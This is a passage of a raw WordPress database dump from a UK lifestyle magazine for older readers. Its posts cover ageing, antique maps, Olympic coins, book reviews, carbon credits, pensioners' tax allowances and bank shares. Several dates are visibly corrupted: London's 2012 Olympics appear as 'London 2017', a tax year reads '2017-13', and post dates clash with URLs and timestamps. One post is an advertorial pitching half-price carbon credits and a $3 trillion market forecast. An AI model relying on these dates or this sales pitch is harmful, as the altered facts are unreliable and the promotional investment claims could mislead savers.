HRT implant with a testosterone boost) I was having open-the-front-doorand- rip-each-other’s-clothes-off sex with a much younger man.</p>&#13;\n<h3>A funny age</h3>&#13;\n<p>As my 60s rolled out, I’ve stopped and stared more. I’ve lost friends, been ill and became tetchy with anyone who said they’d do things “one day”.</p>&#13;\n<p>The post-60s is a funny time for all of us. Some friends are working as hard as they ever did (the best idea). Others have taken to hurtling around the world visiting places they don’t care about and complaining about the food. Kierkegaard said travel is the best way to avoid despair.</p>&#13;\n<p>A few friends are openly panicked about money and their futures. The unhappily married folk who’d been muttering about divorce decided it was better to make a go of things. He said he didn’t know whether to marry again or buy a dog. He bought a dog.</p>&#13;\n<p>You know – I did meet a man like Ryan Gosling. It was instant like. He sent texts and took me to dinners and we talked about everything. We went sailing and I felt 30 and it was lovely. No, of course he didn’t fancy me.</p>&#13;\n<p>But – we’ve stayed friends. I love men friends. He’s given me that feeling I could get picked up on a plane again. Which is a very good feeling to have when you land in Oldagia.</p>&#13;\n									</div>','Welcome to Oldagia','737','publish','open','open','','welcome-to-oldagia','','','2018-04-02 20:07:44','2018-04-02 20:07:44','',0,'http://westonspirit.org.uk/welcome-to-oldagia.asp',0,'post','',0),(133,1,'2015-05-10 00:27:19','2015-05-10 00:27:19','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> lwhitney\" title=\"Posts by Linda Whitney\" rel=\"author\"&gt;Linda Whitney</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"X marks the spot…\" st_url=\"http://westonspirit.org.uk/2012/03/x-marks-the-spot/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"X marks the spot…\" st_url=\"http://westonspirit.org.uk/2012/03/x-marks-the-spot/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"X marks the spot…\" st_url=\"http://westonspirit.org.uk/2012/03/x-marks-the-spot/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"X marks the spot…\" st_url=\"http://westonspirit.org.uk/2012/03/x-marks-the-spot/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"X marks the spot…\" st_url=\"http://westonspirit.org.uk/2012/03/x-marks-the-spot/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Can ancient maps really lead you to buried treasure? Invest wisely and they may well prove worth their weight in gold, reports Linda Whitney</h4>&#13;\n<p>If you find returns on savings and investments leave you with nowhere to go, it could pay to look at a map.</p>&#13;\n<p>Investing in antique maps is becoming more popular as those looking where to put their money – and fed up with lacklustre financial returns – opt for alternative investments.</p>&#13;\n<p>“Increasing numbers of people are telling us that they are buying antique maps because they are disillusioned by financial investments,” says John Trevers, maps specialist at auctioneer Dominic Winters.</p>&#13;\n<p>As with all alternative investments, there is no guarantee that buying antique maps will prove profitable, but there are parts of the market that seem to be rising and others that usually offer steady returns.</p>&#13;\n<p></p><div id=\"attachment_1663\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-1663\" title=\"Cheap thrill: a John Ogilby map such as this could cost less than £100\" src=\"/wp-content/uploads/2012/03/finance-john-ogilby-map-1.jpg\" alt=\"\" width=\"596\" height=\"462\" /><p class=\"wp-caption-text\">Cheap thrill: a John Ogilby map such as this could cost less than £100</p></div>&#13;\n<p>And unlike many antique artworks of similar age, maps are still available for under £100.</p>&#13;\n<h3>Talking point</h3>&#13;\n<p>Road maps by John Ogilby, the first cartographer to map the British road system, are going for about £75 at auction, according to Trevers. Published in 1675-76, these depict the roads as ongoing lines with details of turn-offs, settlements, rivers, bridges, hills and even the kind of land, such as heath or forest, that travellers could see beside the road.</p>&#13;\n<p>“Prices for these maps have not moved in 20 years,” says Trevers. So unless fashions change, prices may not rise, but they will always be a talking point.</p>&#13;\n<p>Antique maps of the English counties are always in demand, however, so their prices have been rising steadily for some time.</p>&#13;\n<p>The most sought-after are maps of areas with high populations of wealthy residents or second homes, such as Surrey, London, Devon and Cornwall.</p>&#13;\n<p>“These go for over £1,000 at auction,” says Trevers.</p>&#13;\n<p>Less popular counties such as Rutland or Flintshire are likely to be cheaper, while counties that are currently attracting new, wealthy residents, such as Lincolnshire, may be a good investment for the future.</p>&#13;\n<p>Look for work by the great cartographers such as John Speed, whose first edition of the maps of English counties was printed in 1611. Another name to look for is Christopher Saxton, the first cartographer to map the English counties. The first edition was printed in 1579, and mid-range examples go for about £5,000 at auction.</p>&#13;\n<p>Other cartographers to look for are Joannes Blaeu and Jan Jansson, who produced British county maps. “If you had bought any maps by these cartographers in the 1970s, you would have doubled your money by today,” says Trevers.</p>&#13;\n<h3>Curious cartography</h3>&#13;\n<p>Also appreciating in value are large-scale maps published in the 17th and 18th centuries which were commonly bound in books or mounted on folded linen and covered in slip cases. Popular counties and cities fetch the highest prices, which have doubled for these kinds of maps over the past 10 to 15 years.</p>&#13;\n<p>Some collectors prefer curiosities, such as the maps of Michael Drayton. Drayton, a friend of Shakespeare, is best known as a poet but in 1612 he published the Poly- Olbion, or Chorographical Description of all the Tracts, Rivers, Mountains, Forests and other parts of the Renowned Isle of Great Britain. As well as songs, it contained his distinctive and fantastical maps.</p>&#13;\n<p>Various regions are depicted, but with scant attention to accuracy. The maps tend to concentrate on the woods and rivers, and are decorated with naked nymphs and goddesses. Shepherds stand on hills, while cities are marked by pictures of well-dressed people with spires and castle buildings on their heads.</p>&#13;\n<h3>There be treasure</h3>&#13;\n<p>If you are interested in making the move into buying, always buy maps in the best condition you can afford and, if hung, make sure they’re kept out of direct sunlight.</p>&#13;\n<p>Remember there are no guarantees, so the golden rule of alternative investment applies: buy something you like. That way, even if your map does not appreciate in value, you still have something to treasure.</p>&#13;\n									</div>','X marks the spot...','669','publish','open','open','','x-marks-the-spot','','','2018-04-02 20:07:39','2018-04-02 20:07:39','',0,'http://westonspirit.org.uk/x-marks-the-spot.asp',0,'post','',0),(134,1,'2014-12-02 03:51:58','2014-12-02 03:51:58','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 April 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"A gift from the gods\" st_url=\"http://westonspirit.org.uk/2012/04/a-gift-from-the-gods/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"A gift from the gods\" st_url=\"http://westonspirit.org.uk/2012/04/a-gift-from-the-gods/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"A gift from the gods\" st_url=\"http://westonspirit.org.uk/2012/04/a-gift-from-the-gods/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"A gift from the gods\" st_url=\"http://westonspirit.org.uk/2012/04/a-gift-from-the-gods/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"A gift from the gods\" st_url=\"http://westonspirit.org.uk/2012/04/a-gift-from-the-gods/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Hundreds of years have passed, but collecting coins and medals to commemorate the Olympic games is just as popular now as it was in ancient Greece in 776BC</h4>&#13;\n<p>The Royal Mint will be celebrating the London 2017 Olympic and Paralympic Games with the first gold kilo UK coin, but there’s nothing new about celebrating the games with a commemorative coin or medal. Our forebears in ancient Greece did something similar.</p>&#13;\n<p>The design of The Royal Mint’s kilo gold coin develops this link with the ancient games by including crossed olive branches. According to myth, the original Olympics took place in 776 BC. At these festivals, which honoured the god Zeus, olive branches taken from a sacred bush in the temple of Zeus were used to crown the winners.</p>&#13;\n<p>Huge crowds came to the festivals, which included religious ceremonies, fairs and entertainment. It is possible that the town of Olympia may have minted special coins commemorating the event.</p>&#13;\n<p></p><div id=\"attachment_1873\" class=\"wp-caption alignright\" style=\"width: 368px\"><img class=\" wp-image-1873 \" title=\"Paying tribute: Nike, the goddess of victory\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/04/117320259-e1335542933976.jpg\" alt=\"\" width=\"358\" height=\"570\" /><p class=\"wp-caption-text\">Paying tribute: Nike, the goddess of victory</p></div>&#13;\n<p>Gareth Williams, a curator in the department of coins and medals at the British Museum, says: “Many ancient Greek city states minted their own coins, including Elis, the state which hosted the sanctuary where the games were held. Many of the coins’ designs included olive wreaths or symbols related to the god Zeus or Nike, the goddess of victory.</p>&#13;\n<p>“Some show Nike presenting a wreath, perhaps linked to the games. It is unclear whether these coins were minted especially for use at the games. Some authorities have suggested that they were, but current thinking is mostly against this.”</p>&#13;\n<p>Richard Bishop, coins specialist at London coin and medal auctioneer and dealer Spink, says: “The ancient Greeks issued spectacular coins, some of which may have had links to the Olympic festival. They have always been popular with coin collectors. Good examples can fetch thousands of pounds at auction.”</p>&#13;\n<p>The medals handed to winners at the first modern Olympic Games in 1896 also reflected the designs used on ancient Greek coins, with olive wreaths and depictions of Zeus.</p>&#13;\n<p>When the first official Olympic coins were struck by The Mint of Finland in 1951 to commemorate the 1952 Summer Olympic Games in Helsinki, the crossed olive branches appeared on the reverse. The obverse bears the five rings Olympic symbol, first adopted in 1913.</p>&#13;\n<p>The mint struck 18,500 of the coins in silver, each worth 500 Markkaa (the former Finnish currency), and they are still collectable today.</p>&#13;\n<p>The next games to prompt the issuing of coins was Tokyo, in 1964. Thereafter host countries began to issue commemorative coins as a regular part of the event, and today, the organising committee of each games, in conjunction with the national mint, has a coin issue programme that can include circulating coins as well as precious metal coins.</p>&#13;\n<p>Ian Jull, manager of coin dealer Coincraft in London says: “Modern Olympic coins are usually collected by people who choose to collect coins from a particular country, so if it has hosted the Olympics, they may buy the coins issued to mark the games. The most commonly seen are those from the Montreal Games in 1976.”</p>&#13;\n<p>Olympic coin collectors can also get together at official World Olympic Collectors Fairs hosted by the International Olympic Committee. The next is in Athens, Greece in May. It includes an Olympic memorabilia fair and coincides with the handing-over ceremony of the Olympic flame by the Hellenic Olympic Committee to the London Organising Committee of Olympic Games.</p>&#13;\n<p>For London 2017, The Royal Mint has issued an extensive collection of commemorative and circulated coins, so you don’t have to be an athlete to collect Olympic silver or even gold.</p>&#13;\n<p>You could start by sifting through your change. The London 2017 Sports Collection is a range of 29 50p coins representing the sports of the Olympic and Paralympic games – they are all in general circulation now, including one depicting football’s offside rule. They were designed by the public and chosen from a national competition that attracted 30,000 entries. Mint condition versions are also available direct from The Royal Mint.</p>&#13;\n<p>When it comes to commemorative coins, the official Gold Kilo Coin has been struck in 0.999 fine gold in a limited edition of 60. It was designed by official artist Sir Anthony Caro and costs £100,000. More affordable – but equally beautiful – is the £5 coin available in gold, silver and base metal.</p>&#13;\n<p>Whatever coins you choose to collect, you will have something in common with the athletes – a valuable keepsake to mark the 2017 London Olympic and Paralympic Games.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><strong><em><a title=\"Royal Mint \" href=\"http://www.royalmint.com/\" target=\"_blank\">www.royalmint.com</a></em></strong></p>&#13;\n									</div>','A gift from the gods','737','publish','open','open','','a-gift-from-the-gods','','','2018-04-02 20:07:34','2018-04-02 20:07:34','',0,'http://westonspirit.org.uk/a-gift-from-the-gods.asp',0,'post','',0),(135,1,'2016-01-28 20:58:07','2016-01-28 20:58:07','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> kfowler\" title=\"Posts by Kerry Fowler\" rel=\"author\"&gt;Kerry Fowler</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"A good read\" st_url=\"http://westonspirit.org.uk/2012/04/a-good-read/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"A good read\" st_url=\"http://westonspirit.org.uk/2012/04/a-good-read/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"A good read\" st_url=\"http://westonspirit.org.uk/2012/04/a-good-read/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"A good read\" st_url=\"http://westonspirit.org.uk/2012/04/a-good-read/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"A good read\" st_url=\"http://westonspirit.org.uk/2012/04/a-good-read/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Alexander McCall Smith created his 44 Scotland Street and Isabel Dalhousie novels using Edinburgh as a backdrop. Why is using real places so important to his fiction?</h4>&#13;\n<p>We like stories to be located – if you don’t give someone a sense of place it is less engaging to the imagination. Once people know where they are, they can visualise it and it makes it feel real.</p>&#13;\n<p></p><div id=\"attachment_1738\" class=\"wp-caption alignright\" style=\"width: 261px\"><img class=\" wp-image-1738  \" title=\"Alexander McCall Smith \" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/Alexander2.jpg\" alt=\"\" width=\"251\" height=\"377\" /><p class=\"wp-caption-text\">Alexander McCall Smith</p></div>&#13;\n<p>But one doesn’t want to clutter too much with authentic reference, or it could become a little like a gazetteer. In my books I put in some real shops and businesses, and sometimes an institution such as a gallery, but you need to use a light brush.</p>&#13;\n<p>People are so influenced by their setting. I’m always interested to see differences in people according to where they live and work. Edinburgh is a slightly reserved city; it’s not cold but the people are cautious. If you look at the skyline the architecture is spiky, slightly haughty. And elegant, too.</p>&#13;\n<p>The best portrayal ever of the old-fashioned attitude was Miss Jean Brodie. And there are people like her, oh yes. But she had her sense of humour, too.</p>&#13;\n<p>People say we shouldn’t pay attention to stereotypes but they exist: they have to come from somewhere. It is a ridiculous notion that we are all the same. If someone comes from New York, then of course you can say they are a typical New Yorker. That’s what they are.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em>Alexander McCall Smith’s Bertie Plays The Blues, from the 44 Scotland Street series, is now out in paperback. Abacus, £7.99</em></p>&#13;\n<h3>Turn a new page</h3>&#13;\n<p><strong>The Baroness: The Search for Nica, The Rebellious Rothschild, Hannah Rothschild</strong></p>&#13;\n<p><em>VIRAGO, £20</em></p>&#13;\n<p><img class=\"alignright  wp-image-1739\" title=\"baroness \" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/baroness-USE-300x484.jpg\" alt=\"\" width=\"161\" height=\"259\" />Pannonica Rothschild: her name was as exotic as it was socially charged. With a life story that was broadly interpreted as extraordinary and extreme, this lithe account by her great-niece Hannah has a compelling fondness at its heart. Nica, as she was known, was wrapped in a cloud of teasing stories: she flew Lancaster bombers during the war; she fell in love with a tune and New York; she left her intensely privileged life to move in with jazz legend Thelonious Monk.</p>&#13;\n<p>As Hannah becomes almost obsessed with learning about Nica, she discovers that “investigating her life made me understand my own”.</p>&#13;\n<p><strong>A History of Food in 100 Recipes, William Sitwell</strong></p>&#13;\n<p><em>COLLINS, £20</em></p>&#13;\n<p><img class=\"alignleft  wp-image-1737\" title=\"A History of Food-USE\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/A-History-of-Food-USE-300x446.jpg\" alt=\"\" width=\"151\" height=\"226\" />There is “nothing new about chefs today being mad, bad, passionate, obsessive foodie fanatics”, says William Sitwell, resident expert on BBC2’s A Question of Taste. And, he reveals in this zesty food-through-history/history-through-food journey, there’s nothing new about arguments over who makes the best cheesecake, either. The ancient Greeks were, apparently, at it in their dinner-party togas. From medieval bread-making to the Welsh rarebit, Carême’s petits soufflés à la rose to Jamie’s steamed salmon with tomato basil couscous – this is a smart dipping sauce for those who love to talk about food.</p>&#13;\n<p><strong>The Beginner’s Goodbye, Anne Tyler</strong></p>&#13;\n<p><em>CHATTO &amp; WIND US, £14.98</em></p>&#13;\n<p><img class=\"alignright  wp-image-1740\" title=\"Beginners Goodbye - USE\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/Beginners-Goodbye-USE-300x481.jpg\" alt=\"\" width=\"162\" height=\"260\" />Aaron is tall, Dorothy is short. Wrong parts of them meet when they hug. With wonderful simplicity, Pulitzer Prize-winner Anne Tyler etches out the story of a marriage and what happens when death interrupts. After Dorothy is killed in an accident, Aaron carries on his work editing Beginner’s Books Of…, and sends thank-you notes for the food gifts and condolences.</p>&#13;\n<p>Then, in an average, everyday way, Dorothy returns from the dead their reunion bringing Aaron a new comfort. Bright with quiet humour and tenderness, this is a story of hope after loss: a lesson for a beginner’s goodbye.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em>And for book lovers who share <strong>Alexander McCall Smith’s</strong> importance of a sense of place, the British Library’s Writing Britain: Wastelands to Wonderlands exhibition highlights the places in British fiction that have captured our imagination.</em></p>&#13;\n<p><em>From 11 May to 25 September.</em></p>&#13;\n<p><em>For more information, visit</em><strong><em> <a title=\"www.bl.uk/writingbritain\" href=\"http://www.bl.uk/writingbritain\" target=\"_blank\">www.bl.uk/writingbritain</a></em></strong></p>&#13;\n									</div>','A good read','641','publish','open','open','','a-good-read','','','2018-04-02 20:07:25','2018-04-02 20:07:25','',0,'http://westonspirit.org.uk/a-good-read.asp',0,'post','',0),(136,1,'2014-05-07 15:04:51','2014-05-07 15:04:51','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 April 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"A powerful way to invest\" st_url=\"http://westonspirit.org.uk/2012/04/a-powerful-way-to-invest/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"A powerful way to invest\" st_url=\"http://westonspirit.org.uk/2012/04/a-powerful-way-to-invest/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"A powerful way to invest\" st_url=\"http://westonspirit.org.uk/2012/04/a-powerful-way-to-invest/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"A powerful way to invest\" st_url=\"http://westonspirit.org.uk/2012/04/a-powerful-way-to-invest/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"A powerful way to invest\" st_url=\"http://westonspirit.org.uk/2012/04/a-powerful-way-to-invest/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>As prices in the carbon market are at an all time low, now is the time for shrewd investors to take advantage</h4>&#13;\n<p>The carbon credit market is a global commodity market, initiated in 1997 by the Kyoto Protocol – an international agreement to reduce emissions of greenhouse gases, signed by around 190 nations.</p>&#13;\n<p>Companies undertake projects that actively reduce overall carbon dioxide (CO2) emissions, for example, by replacing fossil fuel-based electricity generation with energy derived from renewable sources such as wind or hydropower.</p>&#13;\n<p>For every tonne of CO2 or equivalent that they reduce, the companies responsible for these projects are awarded one “credit” by the United Nations Framework Convention for Climate Change (UNFCCC) and these can then be traded.</p>&#13;\n<p>Carbon credits are certainly one of the new kids on the block of the investment community. Being environmentally driven, they appear to be completely on trend and are being offered with promises of huge investment returns.</p>&#13;\n<div id=\"attachment_1794\" style=\"width: 606px\" class=\"wp-caption alignright\"><img class=\"size-full wp-image-1794\" title=\"Carbon investments offer a world of opportunity\" src=\"/wp-content/uploads/2012/03/100842021.jpg\" alt=\"\" width=\"596\" height=\"396\" srcset=\"../../../wp-content/uploads/2012/03/100842021.jpg 596w\" sizes=\"(max-width: 596px) 100vw, 596px\" /><p class=\"wp-caption-text\">Carbon investments offer a world of opportunity</p></div>&#13;\n<p>Unfortunately, the truth of the carbon market is mostly misunderstood and is often misrepresented by the majority of retail carbon brokers. So is there any reality to these promises of spectacular investment performance?</p>&#13;\n<p>Like many things in life there are no guarantees, there is a degree of speculation and there are risks. However, with the correct levels of due diligence, you will find that the facts speak for themselves.</p>&#13;\n<p>Carbon is currently priced at a historical low, but with an understanding of market dynamics this can offer the shrewd investor potential for the coveted “buy low” entry point.</p>&#13;\n<p>The current market size of $125 billion, which is forecast to grow to $3 trillion by 2020, cannot be ignored by the shrewd investor. Ace Carbon is offering a unique opportunity for clients to invest in government-backed solar projects in Asia by purchasing compliant carbon credits at half the current market price, creating potential for a significant investment performance.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong>0207 469 4099</strong></em></p>&#13;\n<p><em><strong><a title=\"www.ace-carbon.com\" href=\"http://www.ace-carbon.com/\" target=\"_blank\">www.ace-carbon.com</a></strong></em></p>&#13;\n									</div>','A powerful way to invest','As prices in the carbon market are at an all time low, now is the time for shrewd investors to take advantage','publish','open','open','','a-powerful-way-to-invest','','','2018-04-02 20:07:22','2018-04-02 20:07:22','',0,'http://westonspirit.org.uk/a-powerful-way-to-invest.asp',0,'post','',0),(137,1,'2014-11-02 03:30:14','2014-11-02 03:30:14','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> mstone\" title=\"Posts by Margaret Stone\" rel=\"author\"&gt;Margaret Stone</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Back to the drawing board, George\" st_url=\"http://westonspirit.org.uk/2012/04/back-to-the-drawing-board-george/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Back to the drawing board, George\" st_url=\"http://westonspirit.org.uk/2012/04/back-to-the-drawing-board-george/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Back to the drawing board, George\" st_url=\"http://westonspirit.org.uk/2012/04/back-to-the-drawing-board-george/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Back to the drawing board, George\" st_url=\"http://westonspirit.org.uk/2012/04/back-to-the-drawing-board-george/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Back to the drawing board, George\" st_url=\"http://westonspirit.org.uk/2012/04/back-to-the-drawing-board-george/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p>A slap in the face is what Chancellor George Osborne has given some five million pensioners in general and this column in particular. Last month I urged him to look hard at age allowances and see how they could be improved for our generation.</p>&#13;\n<p>Well, the answer came loud and clear in last month’s Budget. Osborne doesn’t give a damn for the elderly, who didn’t merit any mention in his speech other than the disgraceful line about the “rising costs of the ageing population and the burden this places on the future generations”.</p>&#13;\n<p>His “saving” of some £3.25 billion (over four years) at their expense wasn’t spelt out.</p>&#13;\n<p>What’s more, Osborne clearly hasn’t listened to the voice of his own creation, the Office of Tax Simplification (OTS). He used the OTS comment that the age allowance was particularly complicated to defend his own decision to axe this tax break.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1779\" title=\"101783085\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/101783085.jpg\" alt=\"\" width=\"596\" height=\"397\" />What Osborne did not go on to say is that the OTS outlines no fewer than 12 – yes 12 – ways in which the tax system for pensioners could be simplified. It made no recommendations because its final report, with recommendations, will not be published until later this year.</p>&#13;\n<p>What on earth is the point of setting up a body specifically to look at how the tax system could be improved for the elderly – and then pre-empting its recommendations?</p>&#13;\n<p>The measures the OTS has put up for consideration include giving pensioners a tax reduction, disregarding a certain level of savings income for tax purposes and changing the age at which the allowance is given.</p>&#13;\n<p>In respect of the level of age allowance, suggestions range from letting it wither on the vine until ordinary personal allowances catch up, to the one I favoured in my last column which was to raise the cut-off point for the age allowance (when it reverts to the basic allowance) to the level where higher rate taxes bite.</p><div class=\"woo-sc-quote\"><p> Osborne doesn’t give a damn for the elderly, who didn’t merit any mention in his speech</p></div>&#13;\n<p>What will happen to the final report of the OTS? Bluntly, it now seems a waste of time for it to continue with its valuable work in respect of pensioner taxation. The diminution and demise of the age allowance, the extra tranche of personal allowance which benefits the mid-income 65-year-olds, has been condemned.</p>&#13;\n<p>Of course, you would expect Dr Ros Altmann, director general of age-oriented group Saga, to label the move as a stealth tax directed at the elderly. But the Institute of Fiscal Studies (IFS), noted and respected for its objectivity, has criticised the introduction of this huge change in the taxation of the elderly. More notice should have been given, said IFS director Paul Johnson, to give those coming up to retirement more time to plan.</p>&#13;\n<p>What would have happened if Osborne had heeded this advice and given notice that the system of age allowances would rise in line with the basic personal allowance increase in the coming tax years?</p>&#13;\n<p>Chartered accountants Blick Rothenberg has done the sums. Instead of remaining frozen at £10,500 (the level for tax year 2017-13) the age allowance for 65 to 74-year-olds would rise to £11,925 and from £10,600 to £12,107 for the 75-plus age group. The level where the allowance starts to be extinguished until it falls to the standard personal allowance would be £26,873 rather than £25,400.</p>&#13;\n<p>Change your mind, Chancellor, and implement these changes.</p>&#13;\n									</div>','Back to the drawing board, George','569','publish','open','open','','back-to-the-drawing-board-george','','','2018-04-02 20:07:18','2018-04-02 20:07:18','',0,'http://westonspirit.org.uk/back-to-the-drawing-board-george.asp',0,'post','',0),(138,1,'2014-07-04 23:13:24','2014-07-04 23:13:24','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Banking on a return\" st_url=\"http://westonspirit.org.uk/2012/04/banking-on-a-return/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Banking on a return\" st_url=\"http://westonspirit.org.uk/2012/04/banking-on-a-return/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Banking on a return\" st_url=\"http://westonspirit.org.uk/2012/04/banking-on-a-return/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Banking on a return\" st_url=\"http://westonspirit.org.uk/2012/04/banking-on-a-return/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Banking on a return\" st_url=\"http://westonspirit.org.uk/2012/04/banking-on-a-return/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>As a result of the financial crisis, the UK banking system is now highly dependent on the ordinary taxpayer. Not only does the state own a large proportion of two UK banks, Lloyds and Royal Bank of Scotland (RBS), but the Bank of England is keeping interest rates low until the economy recovers, so savers and pensioners are receiving pathetic returns on their money.</h4>&#13;\n<p>Given that we are all being so generous, is there any way that investors could extract some compensating profit from the sector? A look at the figures in banks’ recentlypublished annual reports suggests it’s unlikely just yet.</p>&#13;\n<p>All banks have written off billions of pounds in bad loans already and more write-offs seem likely. RBS and Lloyds, for example, are still struggling with their exposure to Irish debt, mainly property-related.</p>&#13;\n<p><img class=\"aligncenter size-full wp-image-1910\" title=\"PIGGY \" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/04/PIGGY-copy.jpg\" alt=\"\" width=\"596\" height=\"528\" />Domestically, the mis-selling of payment protection insurance has bitten hard. Lloyds alone set aside £3.2 billion last year to meet compensation claims. And the rumbling eurozone crisis still has the capability to deliver nasty surprises.</p>&#13;\n<p>Regulation will bring further challenges. All banks are being asked to hold more capital to cover the risks in their businesses, so there is less money for them to use to generate profit by lending or other means. True, the prices of some bank shares have risen by quite large percentages recently. But this recovery was from very low levels.</p>&#13;\n<p>I suspect the most likely way for taxpayers to get some recompense for the massive support given to banks is when the government feels able to sell its holdings in the market and recovers our money. Don’t hold your breath.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong>Tom McIntosh</strong> may have an interest in any investment topic he writes about.</em></p>&#13;\n									</div>','Banking on a return','282','publish','open','open','','banking-on-a-return','','','2018-04-02 20:07:14','2018-04-02 20:07:14','',0,'http://westonspirit.org.uk/banking-on-a-return.asp',0,'post','',0),(139,1,'2017-08-19 23:33:53','2017-08-19 23:33:53','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 April 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Cool, calm and collected\" st_url=\"http://westonspirit.org.uk/2012/04/cool-calm-and-collected/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Cool, calm and collected\" st_url=\"http://westonspirit.org.uk/2012/04/cool-calm-and-collected/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Cool, calm and collected\" st_url=\"http://westonspirit.org.uk/2012/04/cool-calm-and-collected/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Cool, calm and collected\" st_url=\"http://westonspirit.org.uk/2012/04/cool-calm-and-collected/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Cool, calm and collected\" st_url=\"http://westonspirit.org.uk/2012/04/cool-calm-and-collected/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Coins offer more than just monetary value. Collecting can relieve anxiety, unearth historical findings and introduce you to a social world of like-minded people</h4>&#13;\n<p>People collect coins for many reasons – their beauty, value, memories of friends, family and fun times. But why do they enjoy it and what skills does a coin collector need?</p>&#13;\n<p>Whether you want to collect the most ancient of coinage or the latest Royal Mint releases for 2017, collecting items such as coins brings rewards that money cannot 